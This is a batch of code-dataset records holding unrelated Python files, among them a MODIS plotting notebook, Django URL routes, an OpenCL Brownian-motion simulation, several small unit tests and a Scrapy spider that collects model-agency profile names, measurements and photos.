np.ma.masked_invalid(gridded_ndvi)\n\n\n# Here is an example of a seaborn colormap with five xkcd colors\n\n# In[7]:\n\nimport seaborn as sns\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap \ndef five_colors():\n colors = [\"royal blue\", \"baby blue\", \"eggshell\", \"burnt red\", \"soft pink\"]\n #print([the_color for the_color in colors])\n colors=[sns.xkcd_rgb[the_color] for the_color in colors]\n cmap=ListedColormap(colors,N=5)\n cmap.set_over('w')\n cmap.set_under('k') #black\n cmap.set_bad('0.75') #75% grey\n return cmap\n\n\n# and here is our previous colormap\n\n# In[8]:\n\nfrom matplotlib import cm\nfrom matplotlib.colors import Normalize\ndef continuous_colors():\n cmap=cm.YlGnBu_r #see http://wiki.scipy.org/Cookbook/Matplotlib/Show_colormaps\n cmap.set_over('w')\n cmap.set_under('b',alpha=0.1)\n cmap.set_bad('0.75') #75% grey\n return cmap\n\n\n# In[12]:\n\n#\n# choose one of the two\n#\ncmap = continuous_colors()\ncmap = five_colors()\n\n#\n# set the range over which the pallette extends so I use\n# use all my colors on data 10 and 40 degrees centigrade\n#\nvmin= 0.0\nvmax= 0.07\nthe_norm=Normalize(vmin=vmin,vmax=vmax,clip=False)\nfig,ax = plt.subplots(1,1,figsize=(14,18))\ncorners['ax'] = ax\ncorners['resolution']='i'\ncorners['projection']='lcc'\ncorners['urcrnrlon'] = -120.\ncorners['urcrnrlat'] = 50\ncorners['llcrnrlat'] = 45\ncorners['llcrnrlon'] = -125.\nproj = make_plot(corners,lat_sep=1,lon_sep=1)\nlon_array,lat_array=np.meshgrid(lon_centers,lat_centers)\n#\n# translate every lat,lon pair in the scene to x,y plotting coordinates \n# for th Lambert projection\n#\nx,y=proj(lon_array,lat_array)\nCS=proj.pcolormesh(x, y,masked_reflects, cmap=cmap, norm=the_norm)\nCBar=proj.colorbar(CS, 'right', size='5%', pad='5%',extend='both')\nCBar.set_label('Channel 1 reflectance',\n rotation=270,verticalalignment='bottom',size=18)\n_=ax.set_title('Modis Channel 1, August 11, 2016 Vancouver',size=22)\n\n\n# In[10]:\n\nvmin= -0.5\nvmax= 0.8\nthe_norm=Normalize(vmin=vmin,vmax=vmax,clip=False)\nfig,ax2 = plt.subplots(1,1,figsize=(14,18))\ncorners['ax']=ax2\nproj = make_plot(corners,lat_sep=1,lon_sep=1)\nCS=proj.pcolormesh(x, y,masked_ndvi, cmap=cmap, norm=the_norm)\nCBar=proj.colorbar(CS, 'right', size='5%', pad='5%',extend='both')\nCBar.set_label('NDVI',\n rotation=270,verticalalignment='bottom',size=18)\n_=ax.set_title('Modis NDVI, August 11, 2016 Vancouver',size=22)\n\n\n# In[ ]:\n\n\n\n","sub_path":"notebooks/python/vancouver_visible.py","file_name":"vancouver_visible.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"271211138","text":"# Copyright 2014 - Savoir-Faire Linux inc.\n# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport sys\nimport unittest\n\nfrom mox3 import mox\nimport six\n\nfrom surveilclient.common import http\nfrom surveilclient import exc\nfrom surveilclient import shell as surveil_shell\n\n\nclass ShellBase(unittest.TestCase):\n\n def setUp(self):\n super(ShellBase, self).setUp()\n self.m = mox.Mox()\n self.m.StubOutWithMock(http.HTTPClient, 'json_request')\n self.addCleanup(self.m.VerifyAll)\n self.addCleanup(self.m.UnsetStubs)\n\n # Some tests set exc.verbose = 1, so reset on cleanup\n def unset_exc_verbose():\n exc.verbose = 0\n\n self.addCleanup(unset_exc_verbose)\n\n def shell(self, argstr):\n orig = sys.stdout\n try:\n sys.stdout = six.StringIO()\n _shell = surveil_shell.SurveilShell()\n _shell.main(argstr.split())\n self.subcommands = _shell.subcommands.keys()\n except SystemExit:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n self.assertEqual(0, exc_value.code)\n finally:\n out = sys.stdout.getvalue()\n sys.stdout.close()\n sys.stdout = orig\n\n return out\n\n\nclass ShellTest(ShellBase):\n def test_help_unknown_command(self):\n self.assertRaises(exc.CommandError, self.shell, 'help foofoo')\n\n def test_help(self):\n required = [\n '^usage: surveil',\n '(?m)^See \"surveil help COMMAND\" for help on a specific command',\n ]\n help_text = self.shell('help')\n for r in required:\n self.assertRegexpMatches(help_text, r)\n\n def test_help_on_subcommand(self):\n required = [\n '^usage: surveil config-host-list',\n \"(?m)^List all config hosts.\",\n ]\n argstrings = [\n 'help config-host-list',\n ]\n for argstr in argstrings:\n help_text = self.shell(argstr)\n for r in required:\n self.assertRegexpMatches(help_text, r)\n","sub_path":"surveilclient/tests/test_shell.py","file_name":"test_shell.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"266289779","text":"from django.conf.urls import url\nfrom django.conf import settings\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index'),\n # url(r'^(?P[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n url(r'^project/(?P[0-9]+)/$', views.ProjectView.as_view(), name='project'),\n url(r'^(?P[0-9]+)/results/$', views.ResultsView.as_view(), name='results'),\n url(r'^(?P[0-9]+)/vote/$', views.vote, name='vote'),\n url(r'^media/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n\n url(r'^static/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.STATIC_ROOT,\n }),\n]\n\n'''\n\nurlpatterns = [\n # ex: /polls/\n url(r'^$', views.index, name='index'),\n # ex: /polls/5/\n url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n # ex: /polls/5/results/\n url(r'^(?P[0-9]+)/results/$', views.results, name='results'),\n # ex: /polls/5/vote/\n url(r'^(?P[0-9]+)/vote/$', views.vote, name='vote'),\n]\n'''","sub_path":"portfolio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"19263212","text":"import numpy as np\nimport h5py\nimport cv2\nimport utils\nimport time\nfrom skimage import io, color, transform\n\n\n###CONSTANTS\nfiledir = \"data/output/\"\nh5file = \"labprocessed224.hdf5\"\nseed_number = 42\nx_width = 256\nx_height = 256\n\ny_width = 64\ny_height = 64\n\n###\n\n# get the filenames of the training folder and shuffle them\nfilenames = utils.get_filenames(filedir, shuffle=True, seed_number=seed_number)\n\n\ndef my_generator(batch_size, filenames):\n \"\"\"Yield batches of images from img_folder\"\"\"\n\n counter = 0\n while True:\n X_batch = np.zeros((batch_size, x_width, x_height), dtype=float)\n Y_batch = np.zeros((batch_size, y_width, y_height, 2), dtype=float)\n\n if ((counter + 1) * batch_size >= len(filenames)):\n counter = 0\n for i in range(batch_size):\n # load the image from folder first\n try:\n # print(train_dir+filenames[i])\n img = utils.rgb_to_lab(filedir + filenames[i], img_dims = (x_width, x_height))\n y_img = transform.resize(img, (y_width, y_height))\n except Exception as e:\n print(\"Print skipping file as found exception \\n {}\".format(e))\n continue\n X_batch[i] = img[:, :, 0]\n Y_batch[i] = y_img[:, :, 1:]\n X_batch = X_batch.reshape(X_batch.shape + (1,))\n Y_batch = Y_batch[:, :, :, :]\n yield (X_batch, Y_batch)\n counter += batch_size\n\n# Process and load to memory\n\nprint('[INFO] Generating the training data for {} samples...'.format(len(filenames)))\nstart = time.time()\n(Xtrain, Ytrain) = next(my_generator(len(filenames), filenames))\nprint('[INFO] Loading {} samples to memory took {} seconds'.format(len(Xtrain), time.time()-start))\n\n\nimport hickle\nprint(\"[INFO] Dumping to pickle file...\")\nstart = time.time()\nhickle.dump((Xtrain, Ytrain), open(\"data_processed/LAB_Train_Data_15k_256in_65out.hkl\", \"w\"))\nprint(\"[INFO] Dump completed in {} seconds\".format(time.time()-start))\n\n\n#(xtest, ytest) = pickle.load(open('data_processed/LAB_Train_Data.p', 'rb'))\n\n# print(len(xtest), len(ytest))\n\n# print(xtest[0])\n\nquit()\n\n# Open and save array to hdf5\nprint(\"[INFO] Dumping to hdf5 file...\")\nstart = time.time()\nwith h5py.File(h5file, 'w') as f:\n f.create_dataset('Xtrain', data=Xtrain)\n f.create_dataset('Ytrain', data=Ytrain)\nprint(\"[INFO] Dump completed in {} seconds\".format(time.time()-start))\n\nprint(\"[INFO] Opening and checking the data on the file...\")\nwith h5py.File(h5file, 'r') as f:\n print(f.keys())\n\nquit()","sub_path":"labDataset_generator.py","file_name":"labDataset_generator.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"642692694","text":"import webbrowser\nimport sys\nimport re\n\nchrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\n\n\ndef FindUrlInLine(str):\n url = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', str)\n return url\n\n\ndef main():\n if len(sys.argv) < 2:\n exit(0)\n file_name = sys.argv[1]\n with open(file_name) as f:\n lines = f.readlines()\n for line in lines:\n stringList = FindUrlInLine(line)\n for i in stringList:\n webbrowser.get(chrome_path).open(i)\n\n\nmain()\n\n","sub_path":"collectUrl.py","file_name":"collectUrl.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"554109930","text":"'''\nCreated on 02.02.2016\n\n@author: michael\n'''\n\nimport pyopencl as cl\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport struct\nctx=cl.create_some_context(True)\ncqu=cl.CommandQueue(ctx)\nmf=cl.mem_flags\nprg=\"\"\"\nfloat xorshift128p(__global ulong *ranstate1,__global ulong *ranstate2, int gid)\n{\n//random number generator\n//see xorshift128 documentation http://xorshift.di.unimi.it/xorshift128plus.c\nulong s1=ranstate2[gid];\nulong s0=ranstate1[gid];\nranstate1[gid]=s1;\ns1 ^=s1<<23;\nulong s2=s1 ^ s0 ^(s1>>18)^(s0>>5);\nranstate2[gid]=s2;\nreturn convert_float(s2+s0)/18446744073709551616.0;\n}\nfloat get_force(float pos,float alpha,float t,float tau)\n{\n if((t/tau)-floor(t/tau)<0.75){\n return 0;}\n float fp=pos-floor(pos);\n if(fp<0){\n fp+=1;}\n if(fp>alpha){\n return -1/(1-alpha);}\n return 1/alpha;\n}\n__kernel void timestep(__global float *pos,__global ulong *ranstate1,__global ulong *ranstate2,const float tdelta, const float alpha, const float D2, const float t,__global const float* tau,const int iters)\n{\nint gid = get_global_id(0);\nfloat posi=pos[gid];\nfloat taui=tau[gid];\nulong rs1=ranstate1[gid];\nulong rs2=ranstate2[gid];\nulong si=rs1;\nfloat r1=0;\nfloat r2=0;\nfloat z=0;\nfor(int i=0;i>18)^(si>>5);\nr1=convert_float(rs2+si)/18446744073709551616.0;\nsi=rs1;\nrs1=rs2;\nrs2^=rs2<<23;\nrs2=rs2^si^(rs2>>18)^(si>>5);\nr2=convert_float(rs2+si)/18446744073709551616.0;\nz=sqrt(-2*log(r1))*cos(2*M_PI_F*r2);\nposi=posi-get_force(posi,alpha,t+tdelta*i,taui)*tdelta+z*sqrt(D2*tdelta);\n}\npos[gid]=posi;\nranstate1[gid]=rs1;\nranstate2[gid]=rs2;\n}\n\"\"\"\ncprg=cl.Program(ctx,prg).build()\ndef get_pot1(pos,alpha,t,tau):\n if t/tau-int(t/tau)<3/4:\n return 0\n fp=pos-int(pos)\n if fp<0:\n fp+=1\n if fp>alpha:\n return (1-fp)/(1-alpha)\n else:\n return fp/alpha \ndef get_force1(pos,alpha,t,tau):\n if t/tau-int(t/tau)<3/4:\n return 0\n fp=pos-int(pos)\n if fp<0:\n fp+=1\n if fp>alpha:\n return -1/(1-alpha)\n return 1/alpha\ndef time_step(pos,tdelta,alpha,D2,t,tau):\n return pos-tdelta*get_force1(pos, alpha,t,tau)+np.sqrt(D2*tdelta)*random.gauss(0,1)\n\ndef checktimestep(tdelta,alpha,D2,tau):\n if tdelta*max(1/alpha,1/(1-alpha))+4*np.sqrt(D2*tdelta)>alpha/2:\n print(\"Warning: timestep might be too large\")\ndef run_simulation(pos,tdelta,alpha,D2,t0,tau,count):\n \"\"\"\n runs simulation on the cpu, to compare with the gpu result\n \"\"\"\n ret=np.zeros(count,dtype=np.float64)\n ret[0]=pos\n checktimestep(tdelta, alpha, D2, tau)\n for i in range(1,count):\n ret[i]=time_step(ret[i-1], tdelta, alpha, D2, t0+i*tdelta, tau)\n return ret\ndef grun_simulation(pos,tdelta,alpha,D2,t0,tau,count):\n return np.array([x[0] for x in gsimulate(np.array([pos],dtype=np.float32),tdelta,alpha,D2,t0,np.array([tau],dtype=np.float32),1,count)])\ndef gsimulate(pos,tdelta,alpha,D2,t0,tau,count,subcount):\n '''\n Simulate using the opencl device, the kernel is executed for each position/tau tupel count*subcount times, where count is the amount of steps which are done without saving the result back to the host\n '''\n pos_g=cl.Buffer(ctx,mf.READ_WRITE|mf.COPY_HOST_PTR,hostbuf=pos)#creating position buffer\n tau_g=cl.Buffer(ctx,mf.READ_ONLY|mf.COPY_HOST_PTR,hostbuf=tau)#creating tau buffer\n ran1_h=np.array([random.getrandbits(64) for x in tau],dtype=np.uint64)#seeding the rng for each unit\n ran2_h=np.array([random.getrandbits(64) for x in tau],dtype=np.uint64)\n ran1_g=cl.Buffer(ctx,mf.READ_WRITE|mf.COPY_HOST_PTR,hostbuf=ran1_h)\n ran2_g=cl.Buffer(ctx,mf.READ_WRITE|mf.COPY_HOST_PTR,hostbuf=ran2_h)\n res=[np.empty_like(pos)for x in range(subcount)]\n for i in range(subcount):\n cprg.timestep(cqu,pos.shape,None,pos_g,ran1_g,ran2_g,struct.pack('f', tdelta),struct.pack('f', alpha),struct.pack('f', D2),struct.pack('f', t0+i*tdelta*count),tau_g,struct.pack('i', count))\n cl.enqueue_copy(cqu,res[i], pos_g)\n return res\ndef test_consistency():\n s1=random.getstate()\n val1ds=gsimulate(np.array([0.0],dtype=np.float32), 1e-3, 0.2, 0.02, 0, np.array([4.0],dtype=np.float32), 200, 1)[0]\n val1=val1ds[0]\n random.setstate(s1)\n val1s=gsimulate(np.array([0.0],dtype=np.float32), 1e-3, 0.2, 0.02, 0, np.array([4.0],dtype=np.float32), 1,200)[-1][0]\n assert val1==val1s\ntest_consistency()\ncount=800000\ntd=1e-3\ntau=10\ns1=run_simulation(0, td, 0.2, 0.2, 0, tau, count)\nprint(s1)\nplt.plot(range(count),s1)\nx=range(count)\nplt.plot(x,[(0 if (y*td/tau/1-int(y*td/tau/1)<3/4) else 1) for y in x ])\nplt.show()\ndef est_besttau():\n tcount=50\n tmult=100\n taup=np.linspace(0.01,100,tcount,dtype=np.float32)\n tau=np.repeat(taup,tmult, 0)\n pl=gsimulate(np.zeros((tcount*tmult,),dtype=np.float32), td, 0.2, 0.00065, 0, tau, count, 1)[-1]\n pls=np.zeros(tcount)\n plvar=np.zeros(tcount)\n for i in range(tcount):\n for j in range(tmult):\n pls[i]+=pl[i*tmult+j]\n plvar[i]+=pl[i*tmult+j]**2\n pls[i]/=tmult\n plvar[i]-=pls[i]**2\n plvar[i]/=tmult**2\n plvar[i]=np.sqrt(plvar[i])\n print(pls)\n plt.errorbar(taup,pls,yerr=plvar,fmt=\"b+\")\n print(\"maximum:%f, %f, %f\"%(taup[np.argmax(pls)],np.max(pls),plvar[np.argmax(pls)]))\n plt.show()\n return taup[np.argmax(pls)]\ntauop=est_besttau()\nprint(tauop)\nsystems=1000\ncount=800000\nsubcount=10\nres=gsimulate(np.zeros(systems,dtype=np.float32), td, 0.2, 0.00065, 0, np.ones((systems,), dtype=np.float32)*tauop, count, subcount)\nstd=np.zeros(subcount)\nposi=np.zeros(subcount)\nfor i in range(subcount):\n plt.plot(res[i],[random.random() for x in range(len(res[i]))],\"k+\")\n plt.show()\n std[i]=np.std(res[i])\n posi[i]=np.mean(res[i])\nplt.plot(range(subcount),std)\nplt.show()\nplt.plot(range(subcount),posi)\nplt.show()\n","sub_path":"brownian.py","file_name":"brownian.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"21578505","text":"import math\n\ndef euclidean_distance(train_data, test_data):\n\tprint(\"Deve retornar a matriz de distancia entre o vetor de teste e o de treinamento\");\n\tprint(\"Quantidade de linhas: tamanho do vetor de teste\");\n\tprint(\"Quantidade de colunas: tamanho do vetor de treinamento\");\n\n\tnumberColumns = len(train_data[0]) # Calculando o numero de atributos da amostra\n\tresult = []\n\taux = []\n\tsum = 0.0\n\tposition = 0\n\tposition_test = 0\n\tposition_column = 0\n\n\twhile(position < len(train_data)):\n\t\tprint(\"Position:\"+str(position))\n\t\twhile(position_test < len(test_data)):\n\t\t\twhile(position_column < numberColumns):\n\t\t\t\tsum = sum + (train_data[position][position_column] - test_data[position_test][position_column])**2\n\t\t\t\tprint(\"[\"+str(position)+\"][\"+str(position_column)+\"]\"+\" [\"+str(position_test)+\"][\"+str(position_column)+\"]\")\n\t\t\t\tposition_column = position_column + 1\n\t\t\tprint(math.sqrt(sum))\n\t\t\taux.append(math.sqrt(sum))\n\t\t\tsum = 0.0\n\t\t\tposition_test = position_test + 1\n\t\t\tposition_column = 0\n\n\t\tresult.append(aux)\n\t\taux = []\n\t\tposition = position + 1\n\t\tposition_test = 0\n\n\treturn result\n\n\n\n\n#print(euclidean_distance([[0,1,3],[2,4,5],[6,7,10]], [[11,12,13],[20,21,23],[40,50,60]]))\n","sub_path":"src/distance_calculator.py","file_name":"distance_calculator.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"200919091","text":"#!/usr/bin/python3\n\"\"\"Unittest module for the class State\n\"\"\"\nimport unittest\nimport datetime\nimport models\nfrom models.state import State\nimport os\n\n\nclass TestState(unittest.TestCase):\n \"\"\"methods of the test for class State\n \"\"\"\n def test_documentation(self):\n \"\"\"this checks all the documentation\n of all the methods of the class\n \"\"\"\n self.assertIsNotNone(models.state.__doc__)\n self.assertIsNotNone(State.__doc__)\n\n def test_uniqueId(self):\n \"\"\"this check if the instance\n that are created has a unique id\n \"\"\"\n instance1 = State()\n instance2 = State()\n self.assertNotEqual(instance1, instance2)\n self.assertNotEqual(instance1.id, instance2.id)\n\n def test_exec_permissions(self):\n \"\"\"Method that test for check the execution permissions\n \"\"\"\n read = os.access('models/state.py', os.R_OK)\n self.assertTrue(read)\n write = os.access('models/state.py', os.W_OK)\n self.assertTrue(write)\n exect = os.access('models/state.py', os.X_OK)\n self.assertTrue(exect)\n\n def test_typeData(self):\n \"\"\"this method check the type of\n the atributes when created a instance\n \"\"\"\n instance1 = State()\n self.assertIsInstance(instance1.created_at, datetime.datetime)\n self.assertIsInstance(instance1.updated_at, datetime.datetime)\n self.assertIsInstance(instance1.id, str)\n self.assertIsInstance(instance1, State)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_models/test_state.py","file_name":"test_state.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"627225107","text":"def factorial(n):\n \"\"\"Restituisce il fattoriale di un numero n\n >>> factorial(0)\n 1\n >>> factorial(6)\n 720\n \"\"\"\n if n == 0:\n return 1\n else:\n return n * factorial(n - 1)\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod(verbose=False)\n","sub_path":"simulaz/soluzioni/ESA_2017-18_simulazione_appello_1.py","file_name":"ESA_2017-18_simulazione_appello_1.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"513837209","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\nimport scrapy\nimport json\nfrom urllib.parse import quote\nfrom scrapy.spiders import Spider\nimport sys\nsys.path.append(os.getcwd()+'/utils')\nfrom get_redundant import GetRedundant\nfrom html_container import sel_extractor\n\nclass Rus_c_8(Spider):\n\n name=\"Rus_sc_8\"\n def __init__(self, *args, **kwargs):\n self.start_urls=[args]\n self.util=GetRedundant()\n self.Selext = \"\"\n self.numbers = []\n self.pattern = re.compile(r'\\d{2,3}')\n self.same_num, self.same_name, self.same_img = True, True, True\n self.xpath_name, self.xpath_num, self.xpath_img = \"\", \"\", \"\"\n\n def start_requests(self):\n for URL in self.start_urls[0]:\n yield scrapy.Request(url=URL, callback=self.Spec8)\n\n def Spec8(self, response):\n ref=response.url\n print( \"\\n----------\"+response.url+\"----------\\n\" )\n \n name, img_src, num = \"\", \"\", \"\"\n\n if \"m-star68\" in ref:\n name = ref.split(\"/\")[-2].split(\"-\")\n name = \" \".join([e.capitalize() for e in name])\n self.xpath_img = '//div[@class=\"entry-content \"]/figure/img/@src'\n self.same_name, self.same_num = False, False\n\n elif \"models07\" in ref:\n self.xpath_name = '//h1[@class=\"pngfix\"]/text()'\n img = response.xpath('//@src').extract()\n i, go = 0, True\n while go and i < len(img):\n e = img[i]\n if \"images/resources\" in e:\n img_src = \"http://www.models07.ru\" + e.replace(\"/medium\", \"\")\n go = False \n i += 1\n self.xpath_img = '//div[@id=\"content\"]/p/text()'\n self.same_num = False\n\n elif \"ma-zhanna\" in ref:\n self.xpath_name = '//h1[@style=\"margin-bottom: 2px;\"]/text()'\n self.xpath_num = '//td[@valign=\"top\"]/text()'\n img_src, self.xpath_img = \"http://ma-zhanna.ru/\", '//a[@id=\"model_url\"]/@href'\n\n elif \"miss-mariel\" in ref:\n if \"item\" in ref:\n t = response.xpath('//h2[@class=\"itemTitle\"]/text()').extract_first()\n if len(t) > 0:\n name = t[0]\n self.xpath_num = '//span[@class=\"itemExtraFieldsValue\"]/text()'\n img_src, self.xpath_img = \"http://miss-mariel.com\", '//a[@class=\"modal\"]/@href'\n else:\n t = response.xpath('//h3[@id=\"jg_photo_title\"]/text()').extract_first()\n img = \"http://miss-mariel.com\" + response.xpath('//img[@class=\"jg_photo\"]/@src').extract_first()\n if len(img) > 22:\n img_src = img.replace( \"img&id\", \"orig&id\" )\n self.same_num, self.same_img = False, False\n if len(t) > 0:\n t = re.findall( r'\\w+ \\w+', t)\n name = t[0]\n self.same_name = False\n\n elif \"artmoda\" in ref:\n name = ref.split(\"/\")[-1].split(\"-\")[1:]\n name = \" \".join([e.capitalize() for e in name])\n self.xpath_num = '//span[@class=\"field-value\"]/text()'\n img_src, self.xpath_img = \"http://www.artmoda.by\", '//img[@class=\"attachment-full size-full\"]/@src'\n self.same_name = False\n\n elif \"avantmodels\" in ref:\n self.xpath_name = '//h3[@id=\"model_name\"]/text()'\n self.xpath_num = '//*[@class=\"model_param_value\"]/text()'\n self.xpath_img = '//*[@class=\"fancybox_thumbs\"]/@href'\n\n elif \"modusvivendis\" in ref:\n self.xpath_num = self.xpath_name = '//*[@class=\"portfolio-model-file clearfix\"]/div/text()'\n self.xpath_img = '//div/img/@src'\n\n elif \"yesmodels\" in ref:\n self.xpath_name = '//*[@style=\"font-size:34px;\"]/text()'\n self.xpath_num = '//*[@class=\"font_8\"]/text()'\n comp2, t_item = \".jpg\", \"\"\n for e in range(2):\n i, go = 0, True\n if e == 0:\n comp, Tag, t_string = \"simplebook\", \"iframe\", ref\n else:\n comp, Tag = \"userFiles\", \"img\"\n img = sel_extractor(t_string).htmlextractor(_tag=Tag, _atr=\"src\")\n while go and i < len(img):\n t_item = img[i]\n if comp in t_item or comp2 in t_item:\n t_string = t_item\n go = False \n i += 1\n img_src = t_item\n self.same_img = False\n\n elif \"nikmodelmanagement\" in ref:\n name = ref.split(\"/\")[-1].split(\"-\")\n if name == str:\n name = [name]\n name = \" \".join([e.capitalize() for e in name])\n num = response.xpath('//*[@style=\"font-style:italic;\"]/text()').extract()\n if len(num) > 2:\n num.pop(1)\n num += response.xpath('//*[@data-packed=\"true\"]/p/span/span/text()').extract()\n self.numbers = re.findall( r'\\d{2,3}', \" \".join(num))\n img = response.xpath('//img/@src').extract()\n i, go = 0, True\n while go and i < len(img):\n t_item = img[i]\n if \"fill\" in t_item and i != 0:\n img_src = t_item\n go = False \n i += 1\n if img_src != \"\":\n bad_str = re.findall(r'fill\\/(\\w_\\d+,h_\\d+)', img_src)\n if len(bad_str) > 0:\n img_src = img_src.replace(bad_str[0], \"w_930,h_640\")\n\n self.same_name, self.same_img, self.same_num = False, False, False\n\n elif \"aquarelle-models\" in ref:\n self.xpath_name = '//*[@class=\"title__text\"]/text()'\n self.xpath_num = '//*[@class=\"gallery__params\"]/span/text()'\n img_src, self.xpath_img = \"http://aquarelle-models.com\", '//*[@class=\"gallery__pictureLink\"]/@href'\n\n elif \"grace-models\" in ref:\n self.xpath_name = '//*[@class=\"model_title\"]/text()'\n self.xpath_num = '//*[@class=\"grace_model-property\"]/dl/dd/text()'\n img = response.xpath('//*[@class=\"grace_model-picture\"]/div/@style').extract_first()\n if len(img) > 0:\n t_item = re.findall( r'url\\(\\'\\.(.+)\\'\\)', img)\n img_src = \"http://www.grace-models.com\" + t_item[0]\n self.same_img = False\n\n elif \"forward-models\" in ref:\n name = ref.split(\"/\")[-2].split(\"-\")\n if name == str:\n name = [name]\n name = \" \".join([e.capitalize() for e in name])\n num = response.xpath('//td[@align=\"left\"]/small/text()').extract()\n if len(num) > 1:\n num.pop(-1)\n self.numbers = re.findall( r'\\d{2,3}', \" \".join(num))\n self.xpath_img = '//*[@class=\"attachment-medium_large size-medium_large\"]/@src'\n self.same_name, self.same_num = False, False\n\n elif \"lookmodels\" in ref:\n self.xpath_name = '//*[@class=\"data\"]/h1/text()'\n img_src, self.xpath_img = \"http://www.lookmodels.ru\", '//*[@class=\"photomodel\"]/img/@src'\n num = response.xpath('//li/text()').extract() \n if len(num) > 3:\n num = num[:-2]\n self.numbers = re.findall( r'\\d{2,3}', \" \".join(num))\n self.same_num = False\n\n elif \"ultramodels\" in ref:\n self.xpath_name = '//*[@class=\"modelBookName\"]/text()'\n num = response.xpath('//*[@class=\"modelBookSlideMeasurements\"]').extract()\n num = re.findall( r'\\d{2,3}', \" \".join(num))\n self.numbers.append(num[0])\n if len(num) > 0:\n self.numbers += num[1:7:2]\n img = sel_extractor(ref).htmlextractor(_class=\"portrait\", _atr=\"src\")\n i, go = 0, True\n while go and i < len(img):\n t_item = img[i]\n if \".jpg\" in t_item:\n img_src = t_item\n go = False\n i += 1\n self.same_img, self.same_num = False, False\n \n elif \"faces-one\" in ref:\n n = response.xpath('//*[@class=\"p_name\"]/text()').extract()\n if len(n) > 0:\n t_name = re.findall( r'\\w+', n[0])\n if len(t_name) > 0:\n name = t_name[0]\n img_src, self.xpath_img = \"http://www.faces-one.com\", '//*[@border=\"0\"]/@src'\n self.xpath_num = '//*[@class=\"value\"]/text()'\n self.same_name= False\n \n elif \"select\" in ref:\n t_name = ref.split(\"/\")[-1].replace(\".html\", \"\").split(\"_\")\n if len(t_name) > 0:\n name = \" \".join(t_name)\n self.xpath_num = '//*[@class=\"modelInfo info\"]/span/text()'\n t_item = \"http://select.agency\" + response.xpath('//*[@class=\"photo tall\"]/img/@src').extract_first()\n if len(t_item) > 20:\n img_src = t_item.replace(\"big_list_tall/\", \"\")\n self.same_name, self.same_img = False, False\n \n elif \"veronamodels\" in ref:\n self.xpath_name = '//*[@class=\"infotable\"]/h2/text()'\n t_num = response.xpath('//td/text()').extract()\n if len(t_num[-1]) == 2:\n t_num.pop(-1)\n self.numbers = re.findall( r'\\d{2,3}', \" \".join(t_num) )\n img_src, self.xpath_img = \"https://veronamodels.ru\", '//*[@class=\"fancy\"]/@href'\n self.same_num = False\n\n elif \"andyfiordmodels\" in ref:\n self.xpath_name = '//*[@class=\"profile-head__name\"]/text()'\n self.xpath_num = '//*[@class=\"m10s__val\"]/text()'\n t_image = response.xpath('//*[@class=\"picture__wrapper js-lightbox\"]/@data-lightbox').extract_first()\n if len(t_image):\n j = json.loads(t_image)\n img_src = \"http://andyfiordmodels.com\" + j[\"src\"]\n self.same_img = False\n\n elif \"tannmodelmanagement\" in ref:\n self.xpath_name = '//*[@class=\"blogpost\"]/h2/text()'\n self.xpath_img = '//*[@class=\"videocontainer\"]/img/@src'\n self.same_num = False\n\n# Passing paths\n\n if self.same_name == True:\n name = response.xpath(self.xpath_name).extract_first()\n if name == None:\n name = \"\"\n\n if self.same_num == True:\n num = response.xpath( self.xpath_num ).extract()\n if num != None:\n t = re.findall( r'\\d{2,}', \" \".join(num) )\n self.numbers = [e for e in t if len(e) < 4]\n\n if self.same_img == True:\n t = response.xpath(self.xpath_img).extract_first()\n if t != None:\n img_src += t\n elif \" \" in img_src:\n img_src = quote(img_src, safe = \"://\")\n else:\n img_src = \"\"\n \n while len(self.numbers) < 4:\n self.numbers.append(\"\")\n print( name, self.numbers[0:4], img_src )\n template = {\n \"Name\":name,\n \"Height\":self.numbers[0],\n \"Bust\":self.numbers[1],\n \"Waist\":self.numbers[2],\n \"Hip\":self.numbers[3],\n \"Url\":ref,\n \"Image\":img_src\n }\n # self.util.sending_template(in_template=template)\n self.util.store_item(data=[template])\n 